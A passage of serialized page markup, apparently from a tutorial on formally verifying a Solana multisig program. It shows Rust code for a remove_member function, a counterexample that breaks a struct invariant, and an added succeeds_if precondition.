allow_external_execute",{"type":26,"tag":137,"props":27905,"children":27906},{"style":5590},[27907],{"type":32,"value":7072},{"type":26,"tag":137,"props":27909,"children":27910},{"style":5573},[27911],{"type":32,"value":11645},{"type":26,"tag":137,"props":27913,"children":27914},{"style":5601},[27915],{"type":32,"value":6099},{"type":26,"tag":137,"props":27917,"children":27918},{"class":5559,"line":5930},[27919,27924,27928,27933],{"type":26,"tag":137,"props":27920,"children":27921},{"style":5584},[27922],{"type":32,"value":27923},"        keys",{"type":26,"tag":137,"props":27925,"children":27926},{"style":5590},[27927],{"type":32,"value":7072},{"type":26,"tag":137,"props":27929,"children":27930},{"style":6009},[27931],{"type":32,"value":27932}," SparseVec",{"type":26,"tag":137,"props":27934,"children":27935},{"style":5601},[27936],{"type":32,"value":5875},{"type":26,"tag":137,"props":27938,"children":27939},{"class":5559,"line":5939},[27940,27945,27949,27954],{"type":26,"tag":137,"props":27941,"children":27942},{"style":5584},[27943],{"type":32,"value":27944},"            size",{"type":26,"tag":137,"props":27946,"children":27947},{"style":5590},[27948],{"type":32,"value":7072},{"type":26,"tag":137,"props":27950,"children":27951},{"style":5626},[27952],{"type":32,"value":27953}," 5112",{"type":26,"tag":137,"props":27955,"children":27956},{"style":5601},[27957],{"type":32,"value":6099},{"type":26,"tag":137,"props":27959,"children":27960},{"class":5559,"line":6191},[27961],{"type":26,"tag":137,"props":27962,"children":27963},{"style":5601},[27964],{"type":32,"value":27965},"        },\n",{"type":26,"tag":137,"props":27967,"children":27968},{"class":5559,"line":6208},[27969],{"type":26,"tag":137,"props":27970,"children":27971},{"style":5601},[27972],{"type":32,"value":27973},"    },\n",{"type":26,"tag":137,"props":27975,"children":27976},{"class":5559,"line":6225},[27977,27982,27986,27991,27995,27999],{"type":26,"tag":137,"props":27978,"children":27979},{"style":5584},[27980],{"type":32,"value":27981},"    info",{"type":26,"tag":137,"props":27983,"children":27984},{"style":5590},[27985],{"type":32,"value":7072},{"type":26,"tag":137,"props":27987,"children":27988},{"style":6009},[27989],{"type":32,"value":27990}," AccountInfo",{"type":26,"tag":137,"props":27992,"children":27993},{"style":5601},[27994],{"type":32,"value":12175},{"type":26,"tag":137,"props":27996,"children":27997},{"style":5590},[27998],{"type":32,"value":12180},{"type":26,"tag":137,"props":28000,"children":28001},{"style":5601},[28002],{"type":32,"value":28003}," },\n",{"type":26,"tag":137,"props":28005,"children":28006},{"class":5559,"line":6238},[28007],{"type":26,"tag":137,"props":28008,"children":28009},{"style":5601},[28010],{"type":32,"value":6507},{"type":26,"tag":35,"props":28012,"children":28013},{},[28014,28016,28021,28023,28028],{"type":32,"value":28015},"Here we see that the ",{"type":26,"tag":130,"props":28017,"children":28019},{"className":28018},[],[28020],{"type":32,"value":25329},{"type":32,"value":28022}," of the newly created ",{"type":26,"tag":130,"props":28024,"children":28026},{"className":28025},[],[28027],{"type":32,"value":25321},{"type":32,"value":28029}," account is larger than the number of keys (5112) which breaks our struct invariant.",{"type":26,"tag":118,"props":28031,"children":28033},{"id":28032},"verify-requirements-to-remove-a-member",[28034],{"type":32,"value":25359},{"type":26,"tag":35,"props":28036,"children":28037},{},[28038,28040,28045,28046,28051,28053,28059],{"type":32,"value":28039},"Now that we've seen both ",{"type":26,"tag":130,"props":28041,"children":28043},{"className":28042},[],[28044],{"type":32,"value":22748},{"type":32,"value":3339},{"type":26,"tag":130,"props":28047,"children":28049},{"className":28048},[],[28050],{"type":32,"value":24358},{"type":32,"value":28052}," let's take a look at the ",{"type":26,"tag":130,"props":28054,"children":28056},{"className":28055},[],[28057],{"type":32,"value":28058},"remove_member",{"type":32,"value":28060}," function:",{"type":26,"tag":5512,"props":28062,"children":28064},{"code":28063,"language":5551,"meta":7,"className":5552,"style":7},"#[derive(Accounts, Debug)]\npub struct MsAuth\u003C'info> {\n    #[account(mut)]\n    multisig: Box\u003CAccount\u003C'info, Ms>>,\n    #[account(\n        mut,\n        seeds = [\n            b\"squad\",\n            multisig.create_key.as_ref(),\n            b\"multisig\"\n        ], bump = multisig.bump\n    )]\n    pub multisig_auth: Signer\u003C'info>,\n}\n\npub fn remove_member(ctx: Context\u003CMsAuth>, old_member: Pubkey) -> Result\u003C()> {\n    // if there is only one key in this multisig, reject the removal\n    if ctx.accounts.multisig.keys.len() == 1 {\n        return err!(MsError::CannotRemoveSoloMember);\n    }\n    ctx.accounts.multisig.remove_member(old_member)?;\n\n    // if the number of keys is now less than the threshold, adjust it\n    if ctx.accounts.multisig.keys.len() \u003C usize::from(ctx.accounts.multisig.threshold) {\n        let new_threshold: u16 = ctx.accounts.multisig.keys.len().try_into().unwrap();\n        ctx.accounts.multisig.change_threshold(new_threshold)?;\n    }\n    let new_index = ctx.accounts.multisig.transaction_index;\n    ctx.accounts.multisig.set_change_index(new_index)\n}\n",[28065],{"type":26,"tag":130,"props":28066,"children":28067},{"__ignoreMap":7},[28068,28091,28119,28134,28179,28186,28198,28214,28226,28252,28260,28289,28296,28328,28335,28342,28416,28424,28484,28516,28523,28574,28581,28589,28682,28771,28825,28832,28877,28922],{"type":26,"tag":137,"props":28069,"children":28070},{"class":5559,"line":5560},[28071,28075,28079,28083,28087],{"type":26,"tag":137,"props":28072,"children":28073},{"style":5601},[28074],{"type":32,"value":25417},{"type":26,"tag":137,"props":28076,"children":28077},{"style":6009},[28078],{"type":32,"value":25422},{"type":26,"tag":137,"props":28080,"children":28081},{"style":5601},[28082],{"type":32,"value":1108},{"type":26,"tag":137,"props":28084,"children":28085},{"style":6009},[28086],{"type":32,"value":27302},{"type":26,"tag":137,"props":28088,"children":28089},{"style":5601},[28090],{"type":32,"value":22852},{"type":26,"tag":137,"props":28092,"children":28093},{"class":5559,"line":5412},[28094,28098,28102,28107,28111,28115],{"type":26,"tag":137,"props":28095,"children":28096},{"style":5573},[28097],{"type":32,"value":16281},{"type":26,"tag":137,"props":28099,"children":28100},{"style":5573},[28101],{"type":32,"value":23744},{"type":26,"tag":137,"props":28103,"children":28104},{"style":6009},[28105],{"type":32,"value":28106}," MsAuth",{"type":26,"tag":137,"props":28108,"children":28109},{"style":5601},[28110],{"type":32,"value":25502},{"type":26,"tag":137,"props":28112,"children":28113},{"style":6009},[28114],{"type":32,"value":25507},{"type":26,"tag":137,"props":28116,"children":28117},{"style":5601},[28118],{"type":32,"value":9865},{"type":26,"tag":137,"props":28120,"children":28121},{"class":5559,"line":5417},[28122,28126,28130],{"type":26,"tag":137,"props":28123,"children":28124},{"style":5601},[28125],{"type":32,"value":25709},{"type":26,"tag":137,"props":28127,"children":28128},{"style":5573},[28129],{"type":32,"value":6325},{"type":26,"tag":137,"props":28131,"children":28132},{"style":5601},[28133],{"type":32,"value":22852},{"type":26,"tag":137,"props":28135,"children":28136},{"class":5559,"line":5642},[28137,28142,28146,28151,28155,28159,28163,28167,28171,28175],{"type":26,"tag":137,"props":28138,"children":28139},{"style":5584},[28140],{"type":32,"value":28141},"    multisig",{"type":26,"tag":137,"props":28143,"children":28144},{"style":5590},[28145],{"type":32,"value":7072},{"type":26,"tag":137,"props":28147,"children":28148},{"style":6009},[28149],{"type":32,"value":28150}," Box",{"type":26,"tag":137,"props":28152,"children":28153},{"style":5601},[28154],{"type":32,"value":8391},{"type":26,"tag":137,"props":28156,"children":28157},{"style":6009},[28158],{"type":32,"value":19739},{"type":26,"tag":137,"props":28160,"children":28161},{"style":5601},[28162],{"type":32,"value":25502},{"type":26,"tag":137,"props":28164,"children":28165},{"style":6009},[28166],{"type":32,"value":25507},{"type":26,"tag":137,"props":28168,"children":28169},{"style":5601},[28170],{"type":32,"value":1108},{"type":26,"tag":137,"props":28172,"children":28173},{"style":6009},[28174],{"type":32,"value":25321},{"type":26,"tag":137,"props":28176,"children":28177},{"style":5601},[28178],{"type":32,"value":9535},{"type":26,"tag":137,"props":28180,"children":28181},{"class":5559,"line":5745},[28182],{"type":26,"tag":137,"props":28183,"children":28184},{"style":5601},[28185],{"type":32,"value":25519},{"type":26,"tag":137,"props":28187,"children":28188},{"class":5559,"line":5850},[28189,28194],{"type":26,"tag":137,"props":28190,"children":28191},{"style":5573},[28192],{"type":32,"value":28193},"        mut",{"type":26,"tag":137,"props":28195,"children":28196},{"style":5601},[28197],{"type":32,"value":6099},{"type":26,"tag":137,"props":28199,"children":28200},{"class":5559,"line":5878},[28201,28205,28209],{"type":26,"tag":137,"props":28202,"children":28203},{"style":5601},[28204],{"type":32,"value":25603},{"type":26,"tag":137,"props":28206,"children":28207},{"style":5590},[28208],{"type":32,"value":289},{"type":26,"tag":137,"props":28210,"children":28211},{"style":5601},[28212],{"type":32,"value":28213}," [\n",{"type":26,"tag":137,"props":28215,"children":28216},{"class":5559,"line":5891},[28217,28222],{"type":26,"tag":137,"props":28218,"children":28219},{"style":6837},[28220],{"type":32,"value":28221},"            b\"squad\"",{"type":26,"tag":137,"props":28223,"children":28224},{"style":5601},[28225],{"type":32,"value":6099},{"type":26,"tag":137,"props":28227,"children":28228},{"class":5559,"line":5909},[28229,28234,28238,28243,28247],{"type":26,"tag":137,"props":28230,"children":28231},{"style":5601},[28232],{"type":32,"value":28233},"            multisig",{"type":26,"tag":137,"props":28235,"children":28236},{"style":5590},[28237],{"type":32,"value":470},{"type":26,"tag":137,"props":28239,"children":28240},{"style":5601},[28241],{"type":32,"value":28242},"create_key",{"type":26,"tag":137,"props":28244,"children":28245},{"style":5590},[28246],{"type":32,"value":470},{"type":26,"tag":137,"props":28248,"children":28249},{"style":5601},[28250],{"type":32,"value":28251},"as_ref(),\n",{"type":26,"tag":137,"props":28253,"children":28254},{"class":5559,"line":5930},[28255],{"type":26,"tag":137,"props":28256,"children":28257},{"style":6837},[28258],{"type":32,"value":28259},"            b\"multisig\"\n",{"type":26,"tag":137,"props":28261,"children":28262},{"class":5559,"line":5939},[28263,28268,28273,28277,28281,28285],{"type":26,"tag":137,"props":28264,"children":28265},{"style":5601},[28266],{"type":32,"value":28267},"        ], ",{"type":26,"tag":137,"props":28269,"children":28270},{"style":5584},[28271],{"type":32,"value":28272},"bump",{"type":26,"tag":137,"props":28274,"children":28275},{"style":5590},[28276],{"type":32,"value":5593},{"type":26,"tag":137,"props":28278,"children":28279},{"style":5584},[28280],{"type":32,"value":25665},{"type":26,"tag":137,"props":28282,"children":28283},{"style":5590},[28284],{"type":32,"value":470},{"type":26,"tag":137,"props":28286,"children":28287},{"style":5601},[28288],{"type":32,"value":25645},{"type":26,"tag":137,"props":28290,"children":28291},{"class":5559,"line":6191},[28292],{"type":26,"tag":137,"props":28293,"children":28294},{"style":5601},[28295],{"type":32,"value":25653},{"type":26,"tag":137,"props":28297,"children":28298},{"class":5559,"line":6208},[28299,28303,28308,28312,28316,28320,28324],{"type":26,"tag":137,"props":28300,"children":28301},{"style":5573},[28302],{"type":32,"value":23436},{"type":26,"tag":137,"props":28304,"children":28305},{"style":5584},[28306],{"type":32,"value":28307}," multisig_auth",{"type":26,"tag":137,"props":28309,"children":28310},{"style":5590},[28311],{"type":32,"value":7072},{"type":26,"tag":137,"props":28313,"children":28314},{"style":6009},[28315],{"type":32,"value":25738},{"type":26,"tag":137,"props":28317,"children":28318},{"style":5601},[28319],{"type":32,"value":25502},{"type":26,"tag":137,"props":28321,"children":28322},{"style":6009},[28323],{"type":32,"value":25507},{"type":26,"tag":137,"props":28325,"children":28326},{"style":5601},[28327],{"type":32,"value":8723},{"type":26,"tag":137,"props":28329,"children":28330},{"class":5559,"line":6225},[28331],{"type":26,"tag":137,"props":28332,"children":28333},{"style":5601},[28334],{"type":32,"value":6507},{"type":26,"tag":137,"props":28336,"children":28337},{"class":5559,"line":6238},[28338],{"type":26,"tag":137,"props":28339,"children":28340},{"emptyLinePlaceholder":18},[28341],{"type":32,"value":6276},{"type":26,"tag":137,"props":28343,"children":28344},{"class":5559,"line":6247},[28345,28349,28353,28358,28362,28366,28370,28374,28378,28383,28387,28392,28396,28400,28404,28408,28412],{"type":26,"tag":137,"props":28346,"children":28347},{"style":5573},[28348],{"type":32,"value":16281},{"type":26,"tag":137,"props":28350,"children":28351},{"style":5573},[28352],{"type":32,"value":16286},{"type":26,"tag":137,"props":28354,"children":28355},{"style":5682},[28356],{"type":32,"value":28357}," remove_member",{"type":26,"tag":137,"props":28359,"children":28360},{"style":5601},[28361],{"type":32,"value":165},{"type":26,"tag":137,"props":28363,"children":28364},{"style":5584},[28365],{"type":32,"value":22874},{"type":26,"tag":137,"props":28367,"children":28368},{"style":5590},[28369],{"type":32,"value":7072},{"type":26,"tag":137,"props":28371,"children":28372},{"style":6009},[28373],{"type":32,"value":22883},{"type":26,"tag":137,"props":28375,"children":28376},{"style":5601},[28377],{"type":32,"value":8391},{"type":26,"tag":137,"props":28379,"children":28380},{"style":6009},[28381],{"type":32,"value":28382},"MsAuth",{"type":26,"tag":137,"props":28384,"children":28385},{"style":5601},[28386],{"type":32,"value":9214},{"type":26,"tag":137,"props":28388,"children":28389},{"style":5584},[28390],{"type":32,"value":28391},"old_member",{"type":26,"tag":137,"props":28393,"children":28394},{"style":5590},[28395],{"type":32,"value":7072},{"type":26,"tag":137,"props":28397,"children":28398},{"style":6009},[28399],{"type":32,"value":23450},{"type":26,"tag":137,"props":28401,"children":28402},{"style":5601},[28403],{"type":32,"value":5671},{"type":26,"tag":137,"props":28405,"children":28406},{"style":5590},[28407],{"type":32,"value":16348},{"type":26,"tag":137,"props":28409,"children":28410},{"style":6009},[28411],{"type":32,"value":16353},{"type":26,"tag":137,"props":28413,"children":28414},{"style":5601},[28415],{"type":32,"value":22925},{"type":26,"tag":137,"props":28417,"children":28418},{"class":5559,"line":6270},[28419],{"type":26,"tag":137,"props":28420,"children":28421},{"style":5564},[28422],{"type":32,"value":28423},"    // if there is only one key in this multisig, reject the removal\n",{"type":26,"tag":137,"props":28425,"children":28426},{"class":5559,"line":6279},[28427,28431,28436,28440,28444,28448,28452,28456,28460,28464,28468,28472,28476,28480],{"type":26,"tag":137,"props":28428,"children":28429},{"style":5610},[28430],{"type":32,"value":14870},{"type":26,"tag":137,"props":28432,"children":28433},{"style":5584},[28434],{"type":32,"value":28435}," ctx",{"type":26,"tag":137,"props":28437,"children":28438},{"style":5590},[28439],{"type":32,"value":470},{"type":26,"tag":137,"props":28441,"children":28442},{"style":5601},[28443],{"type":32,"value":17266},{"type":26,"tag":137,"props":28445,"children":28446},{"style":5590},[28447],{"type":32,"value":470},{"type":26,"tag":137,"props":28449,"children":28450},{"style":5601},[28451],{"type":32,"value":26396},{"type":26,"tag":137,"props":28453,"children":28454},{"style":5590},[28455],{"type":32,"value":470},{"type":26,"tag":137,"props":28457,"children":28458},{"style":5601},[28459],{"type":32,"value":23576},{"type":26,"tag":137,"props":28461,"children":28462},{"style":5590},[28463],{"type":32,"value":470},{"type":26,"tag":137,"props":28465,"children":28466},{"style":5682},[28467],{"type":32,"value":11727},{"type":26,"tag":137,"props":28469,"children":28470},{"style":5601},[28471],{"type":32,"value":16634},{"type":26,"tag":137,"props":28473,"children":28474},{"style":5590},[28475],{"type":32,"value":11161},{"type":26,"tag":137,"props":28477,"children":28478},{"style":5626},[28479],{"type":32,"value":7104},{"type":26,"tag":137,"props":28481,"children":28482},{"style":5601},[28483],{"type":32,"value":5875},{"type":26,"tag":137,"props":28485,"children":28486},{"class":5559,"line":6288},[28487,28491,28495,28499,28503,28507,28512],{"type":26,"tag":137,"props":28488,"children":28489},{"style":5610},[28490],{"type":32,"value":18336},{"type":26,"tag":137,"props":28492,"children":28493},{"style":5682},[28494],{"type":32,"value":26099},{"type":26,"tag":137,"props":28496,"children":28497},{"style":5601},[28498],{"type":32,"value":165},{"type":26,"tag":137,"props":28500,"children":28501},{"style":6009},[28502],{"type":32,"value":26108},{"type":26,"tag":137,"props":28504,"children":28505},{"style":5590},[28506],{"type":32,"value":6072},{"type":26,"tag":137,"props":28508,"children":28509},{"style":6009},[28510],{"type":32,"value":28511},"CannotRemoveSoloMember",{"type":26,"tag":137,"props":28513,"children":28514},{"style":5601},[28515],{"type":32,"value":6430},{"type":26,"tag":137,"props":28517,"children":28518},{"class":5559,"line":6355},[28519],{"type":26,"tag":137,"props":28520,"children":28521},{"style":5601},[28522],{"type":32,"value":5945},{"type":26,"tag":137,"props":28524,"children":28525},{"class":5559,"line":6363},[28526,28530,28534,28538,28542,28546,28550,28554,28558,28562,28566,28570],{"type":26,"tag":137,"props":28527,"children":28528},{"style":5584},[28529],{"type":32,"value":22817},{"type":26,"tag":137,"props":28531,"children":28532},{"style":5590},[28533],{"type":32,"value":470},{"type":26,"tag":137,"props":28535,"children":28536},{"style":5601},[28537],{"type":32,"value":17266},{"type":26,"tag":137,"props":28539,"children":28540},{"style":5590},[28541],{"type":32,"value":470},{"type":26,"tag":137,"props":28543,"children":28544},{"style":5601},[28545],{"type":32,"value":26396},{"type":26,"tag":137,"props":28547,"children":28548},{"style":5590},[28549],{"type":32,"value":470},{"type":26,"tag":137,"props":28551,"children":28552},{"style":5682},[28553],{"type":32,"value":28058},{"type":26,"tag":137,"props":28555,"children":28556},{"style":5601},[28557],{"type":32,"value":165},{"type":26,"tag":137,"props":28559,"children":28560},{"style":5584},[28561],{"type":32,"value":28391},{"type":26,"tag":137,"props":28563,"children":28564},{"style":5601},[28565],{"type":32,"value":200},{"type":26,"tag":137,"props":28567,"children":28568},{"style":5590},[28569],{"type":32,"value":5737},{"type":26,"tag":137,"props":28571,"children":28572},{"style":5601},[28573],{"type":32,"value":5604},{"type":26,"tag":137,"props":28575,"children":28576},{"class":5559,"line":6393},[28577],{"type":26,"tag":137,"props":28578,"children":28579},{"emptyLinePlaceholder":18},[28580],{"type":32,"value":6276},{"type":26,"tag":137,"props":28582,"children":28583},{"class":5559,"line":6401},[28584],{"type":26,"tag":137,"props":28585,"children":28586},{"style":5564},[28587],{"type":32,"value":28588},"    // if the number of keys is now less than the threshold, adjust it\n",{"type":26,"tag":137,"props":28590,"children":28591},{"class":5559,"line":6433},[28592,28596,28600,28604,28608,28612,28616,28620,28624,28628,28632,28637,28641,28645,28649,28653,28657,28661,28665,28669,28673,28677],{"type":26,"tag":137,"props":28593,"children":28594},{"style":5610},[28595],{"type":32,"value":14870},{"type":26,"tag":137,"props":28597,"children":28598},{"style":5584},[28599],{"type":32,"value":28435},{"type":26,"tag":137,"props":28601,"children":28602},{"style":5590},[28603],{"type":32,"value":470},{"type":26,"tag":137,"props":28605,"children":28606},{"style":5601},[28607],{"type":32,"value":17266},{"type":26,"tag":137,"props":28609,"children":28610},{"style":5590},[28611],{"type":32,"value":470},{"type":26,"tag":137,"props":28613,"children":28614},{"style":5601},[28615],{"type":32,"value":26396},{"type":26,"tag":137,"props":28617,"children":28618},{"style":5590},[28619],{"type":32,"value":470},{"type":26,"tag":137,"props":28621,"children":28622},{"style":5601},[28623],{"type":32,"value":23576},{"type":26,"tag":137,"props":28625,"children":28626},{"style":5590},[28627],{"type":32,"value":470},{"type":26,"tag":137,"props":28629,"children":28630},{"style":5682},[28631],{"type":32,"value":11727},{"type":26,"tag":137,"props":28633,"children":28634},{"style":5601},[28635],{"type":32,"value":28636},"() \u003C ",{"type":26,"tag":137,"props":28638,"children":28639},{"style":6009},[28640],{"type":32,"value":19194},{"type":26,"tag":137,"props":28642,"children":28643},{"style":5590},[28644],{"type":32,"value":6072},{"type":26,"tag":137,"props":28646,"children":28647},{"style":5682},[28648],{"type":32,"value":22066},{"type":26,"tag":137,"props":28650,"children":28651},{"style":5601},[28652],{"type":32,"value":165},{"type":26,"tag":137,"props":28654,"children":28655},{"style":5584},[28656],{"type":32,"value":22874},{"type":26,"tag":137,"props":28658,"children":28659},{"style":5590},[28660],{"type":32,"value":470},{"type":26,"tag":137,"props":28662,"children":28663},{"style":5601},[28664],{"type":32,"value":17266},{"type":26,"tag":137,"props":28666,"children":28667},{"style":5590},[28668],{"type":32,"value":470},{"type":26,"tag":137,"props":28670,"children":28671},{"style":5601},[28672],{"type":32,"value":26396},{"type":26,"tag":137,"props":28674,"children":28675},{"style":5590},[28676],{"type":32,"value":470},{"type":26,"tag":137,"props":28678,"children":28679},{"style":5601},[28680],{"type":32,"value":28681},"threshold) {\n",{"type":26,"tag":137,"props":28683,"children":28684},{"class":5559,"line":6441},[28685,28689,28694,28698,28702,28706,28710,28714,28718,28722,28726,28730,28734,28738,28742,28746,28750,28755,28759,28763,28767],{"type":26,"tag":137,"props":28686,"children":28687},{"style":5573},[28688],{"type":32,"value":5648},{"type":26,"tag":137,"props":28690,"children":28691},{"style":5584},[28692],{"type":32,"value":28693}," new_threshold",{"type":26,"tag":137,"props":28695,"children":28696},{"style":5590},[28697],{"type":32,"value":7072},{"type":26,"tag":137,"props":28699,"children":28700},{"style":6009},[28701],{"type":32,"value":23623},{"type":26,"tag":137,"props":28703,"children":28704},{"style":5590},[28705],{"type":32,"value":5593},{"type":26,"tag":137,"props":28707,"children":28708},{"style":5584},[28709],{"type":32,"value":28435},{"type":26,"tag":137,"props":28711,"children":28712},{"style":5590},[28713],{"type":32,"value":470},{"type":26,"tag":137,"props":28715,"children":28716},{"style":5601},[28717],{"type":32,"value":17266},{"type":26,"tag":137,"props":28719,"children":28720},{"style":5590},[28721],{"type":32,"value":470},{"type":26,"tag":137,"props":28723,"children":28724},{"style":5601},[28725],{"type":32,"value":26396},{"type":26,"tag":137,"props":28727,"children":28728},{"style":5590},[28729],{"type":32,"value":470},{"type":26,"tag":137,"props":28731,"children":28732},{"style":5601},[28733],{"type":32,"value":23576},{"type":26,"tag":137,"props":28735,"children":28736},{"style":5590},[28737],{"type":32,"value":470},{"type":26,"tag":137,"props":28739,"children":28740},{"style":5682},[28741],{"type":32,"value":11727},{"type":26,"tag":137,"props":28743,"children":28744},{"style":5601},[28745],{"type":32,"value":16470},{"type":26,"tag":137,"props":28747,"children":28748},{"style":5590},[28749],{"type":32,"value":470},{"type":26,"tag":137,"props":28751,"children":28752},{"style":5682},[28753],{"type":32,"value":28754},"try_into",{"type":26,"tag":137,"props":28756,"children":28757},{"style":5601},[28758],{"type":32,"value":16470},{"type":26,"tag":137,"props":28760,"children":28761},{"style":5590},[28762],{"type":32,"value":470},{"type":26,"tag":137,"props":28764,"children":28765},{"style":5682},[28766],{"type":32,"value":6262},{"type":26,"tag":137,"props":28768,"children":28769},{"style":5601},[28770],{"type":32,"value":6267},{"type":26,"tag":137,"props":28772,"children":28773},{"class":5559,"line":6501},[28774,28779,28783,28787,28791,28795,28799,28804,28808,28813,28817,28821],{"type":26,"tag":137,"props":28775,"children":28776},{"style":5584},[28777],{"type":32,"value":28778},"        ctx",{"type":26,"tag":137,"props":28780,"children":28781},{"style":5590},[28782],{"type":32,"value":470},{"type":26,"tag":137,"props":28784,"children":28785},{"style":5601},[28786],{"type":32,"value":17266},{"type":26,"tag":137,"props":28788,"children":28789},{"style":5590},[28790],{"type":32,"value":470},{"type":26,"tag":137,"props":28792,"children":28793},{"style":5601},[28794],{"type":32,"value":26396},{"type":26,"tag":137,"props":28796,"children":28797},{"style":5590},[28798],{"type":32,"value":470},{"type":26,"tag":137,"props":28800,"children":28801},{"style":5682},[28802],{"type":32,"value":28803},"change_threshold",{"type":26,"tag":137,"props":28805,"children":28806},{"style":5601},[28807],{"type":32,"value":165},{"type":26,"tag":137,"props":28809,"children":28810},{"style":5584},[28811],{"type":32,"value":28812},"new_threshold",{"type":26,"tag":137,"props":28814,"children":28815},{"style":5601},[28816],{"type":32,"value":200},{"type":26,"tag":137,"props":28818,"children":28819},{"style":5590},[28820],{"type":32,"value":5737},{"type":26,"tag":137,"props":28822,"children":28823},{"style":5601},[28824],{"type":32,"value":5604},{"type":26,"tag":137,"props":28826,"children":28827},{"class":5559,"line":11634},[28828],{"type":26,"tag":137,"props":28829,"children":28830},{"style":5601},[28831],{"type":32,"value":5945},{"type":26,"tag":137,"props":28833,"children":28834},{"class":5559,"line":11652},[28835,28839,28844,28848,28852,28856,28860,28864,28868,28872],{"type":26,"tag":137,"props":28836,"children":28837},{"style":5573},[28838],{"type":32,"value":5576},{"type":26,"tag":137,"props":28840,"children":28841},{"style":5584},[28842],{"type":32,"value":28843}," new_index",{"type":26,"tag":137,"props":28845,"children":28846},{"style":5590},[28847],{"type":32,"value":5593},{"type":26,"tag":137,"props":28849,"children":28850},{"style":5584},[28851],{"type":32,"value":28435},{"type":26,"tag":137,"props":28853,"children":28854},{"style":5590},[28855],{"type":32,"value":470},{"type":26,"tag":137,"props":28857,"children":28858},{"style":5601},[28859],{"type":32,"value":17266},{"type":26,"tag":137,"props":28861,"children":28862},{"style":5590},[28863],{"type":32,"value":470},{"type":26,"tag":137,"props":28865,"children":28866},{"style":5601},[28867],{"type":32,"value":26396},{"type":26,"tag":137,"props":28869,"children":28870},{"style":5590},[28871],{"type":32,"value":470},{"type":26,"tag":137,"props":28873,"children":28874},{"style":5601},[28875],{"type":32,"value":28876},"transaction_index;\n",{"type":26,"tag":137,"props":28878,"children":28879},{"class":5559,"line":11697},[28880,28884,28888,28892,28896,28900,28904,28909,28913,28918],{"type":26,"tag":137,"props":28881,"children":28882},{"style":5584},[28883],{"type":32,"value":22817},{"type":26,"tag":137,"props":28885,"children":28886},{"style":5590},[28887],{"type":32,"value":470},{"type":26,"tag":137,"props":28889,"children":28890},{"style":5601},[28891],{"type":32,"value":17266},{"type":26,"tag":137,"props":28893,"children":28894},{"style":5590},[28895],{"type":32,"value":470},{"type":26,"tag":137,"props":28897,"children":28898},{"style":5601},[28899],{"type":32,"value":26396},{"type":26,"tag":137,"props":28901,"children":28902},{"style":5590},[28903],{"type":32,"value":470},{"type":26,"tag":137,"props":28905,"children":28906},{"style":5682},[28907],{"type":32,"value":28908},"set_change_index",{"type":26,"tag":137,"props":28910,"children":28911},{"style":5601},[28912],{"type":32,"value":165},{"type":26,"tag":137,"props":28914,"children":28915},{"style":5584},[28916],{"type":32,"value":28917},"new_index",{"type":26,"tag":137,"props":28919,"children":28920},{"style":5601},[28921],{"type":32,"value":5742},{"type":26,"tag":137,"props":28923,"children":28924},{"class":5559,"line":11803},[28925],{"type":26,"tag":137,"props":28926,"children":28927},{"style":5601},[28928],{"type":32,"value":6507},{"type":26,"tag":35,"props":28930,"children":28931},{},[28932,28934,28939],{"type":32,"value":28933},"First let's establish the ",{"type":26,"tag":130,"props":28935,"children":28937},{"className":28936},[],[28938],{"type":32,"value":22748},{"type":32,"value":28940}," condition. We can do this either interactively, following counterexamples like in the first example or we can guess what a sufficient condition might be:",{"type":26,"tag":5512,"props":28942,"children":28944},{"code":28943,"language":5551,"meta":7,"className":5552,"style":7},"#[succeeds_if(\n    ctx.accounts.multisig.keys.len() > 1\n)]\nfn remove_member(...) { ... }\n",[28945],{"type":26,"tag":130,"props":28946,"children":28947},{"__ignoreMap":7},[28948,28955,29002,29009],{"type":26,"tag":137,"props":28949,"children":28950},{"class":5559,"line":5560},[28951],{"type":26,"tag":137,"props":28952,"children":28953},{"style":5601},[28954],{"type":32,"value":26703},{"type":26,"tag":137,"props":28956,"children":28957},{"class":5559,"line":5412},[28958,28962,28966,28970,28974,28978,28982,28986,28990,28994,28998],{"type":26,"tag":137,"props":28959,"children":28960},{"style":5601},[28961],{"type":32,"value":22817},{"type":26,"tag":137,"props":28963,"children":28964},{"style":5590},[28965],{"type":32,"value":470},{"type":26,"tag":137,"props":28967,"children":28968},{"style":5601},[28969],{"type":32,"value":17266},{"type":26,"tag":137,"props":28971,"children":28972},{"style":5590},[28973],{"type":32,"value":470},{"type":26,"tag":137,"props":28975,"children":28976},{"style":5601},[28977],{"type":32,"value":26396},{"type":26,"tag":137,"props":28979,"children":28980},{"style":5590},[28981],{"type":32,"value":470},{"type":26,"tag":137,"props":28983,"children":28984},{"style":5601},[28985],{"type":32,"value":23576},{"type":26,"tag":137,"props":28987,"children":28988},{"style":5590},[28989],{"type":32,"value":470},{"type":26,"tag":137,"props":28991,"children":28992},{"style":5601},[28993],{"type":32,"value":23614},{"type":26,"tag":137,"props":28995,"children":28996},{"style":5590},[28997],{"type":32,"value":13052},{"type":26,"tag":137,"props":28999,"children":29000},{"style":5601},[29001],{"type":32,"value":22035},{"type":26,"tag":137,"props":29003,"children":29004},{"class":5559,"line":5417},[29005],{"type":26,"tag":137,"props":29006,"children":29007},{"style":5601},[29008],{"type":32,"value":22852},{"type":26,"tag":137,"props":29010,"children":29011},{"class":5559,"line":5642},[29012,29016,29020,29024,29028,29032,29036],{"type":26,"tag":137,"props":29013,"children":29014},{"style":5573},[29015],{"type":32,"value":22860},{"type":26,"tag":137,"props":29017,"children":29018},{"style":5682},[29019],{"type":32,"value":28357},{"type":26,"tag":137,"props":29021,"children":29022},{"style":5601},[29023],{"type":32,"value":165},{"type":26,"tag":137,"props":29025,"children":29026},{"style":5590},[29027],{"type":32,"value":12180},{"type":26,"tag":137,"props":29029,"children":29030},{"style":5601},[29031],{"type":32,"value":26580},{"type":26,"tag":137,"props":29033,"children":29034},{"style":5590},[29035],{"type":32,"value":12180},{"type":26,"tag":137,"props":29037,"children":29038},{"style":5601},[29039],{"type":32,"value":12185},{"type":26,"tag":35,"props":29041,"children":29042},{},[29043,29045,29050],{"type":32,"value":29044},"And for now let's remove the invariant on the ",{"type":26,"tag":130,"props":29046,"children":29048},{"className":29047},[],[29049],{"type":32,"value":25321},{"type":32,"value":29051}," account:",{"type":26,"tag":5512,"props":29053,"children":29055},{"code":29054,"language":5551,"meta":7,"className":5552,"style":7},"#[invariant()]\npub struct Ms { ... 